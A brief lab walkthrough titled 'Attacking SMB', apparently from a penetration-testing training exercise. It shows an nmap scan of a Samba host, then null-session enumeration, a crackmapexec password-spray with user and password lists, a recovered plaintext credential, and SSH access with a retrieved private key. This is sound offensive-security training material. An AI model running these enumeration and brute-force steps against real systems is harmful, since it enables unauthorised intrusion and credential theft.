Attacking SMB
May 21, 2024
Last updated
# Nmap 7.94 scan initiated Wed May 22 13:28:36 2024 as: nmap -sC -sV -oN nmap-smb -p 445 -vv 10.129.251.246
Nmap scan report for 10.129.251.246
Host is up, received conn-refused (0.32s latency).
Scanned at 2024-05-22 13:28:36 PST for 14s
PORT STATE SERVICE REASON VERSION
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ATTCSVC-LINUX<00> Flags: <unique><active>
| ATTCSVC-LINUX<03> Flags: <unique><active>
| ATTCSVC-LINUX<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 10995/tcp): CLEAN (Couldn't connect)
| Check 2 (port 62584/tcp): CLEAN (Couldn't connect)
| Check 3 (port 52666/udp): CLEAN (Failed to receive data)
| Check 4 (port 24096/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-05-22T05:28:54
|_ start_date: N/A
|_clock-skew: 7s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 22 13:28:50 2024 -- 1 IP address (1 host up) scanned in 14.06 seconds
smbclient -L 10.129.251.246
smbclient \\\\10.129.251.246\\GGJ
smbmap -H 10.129.251.246 -r GGJ
rpcclient -U'%' 10.129.251.246
poetry run crackmapexec smb 10.129.251.246 -u users.list -p pws.list --local-auth
jason:34c8zuNBo91!@28Bszh
smbclient -U jason \\\\10.129.251.246\\GGJ
chmod 600 id_rsa
ssh -i id_rsa john@IP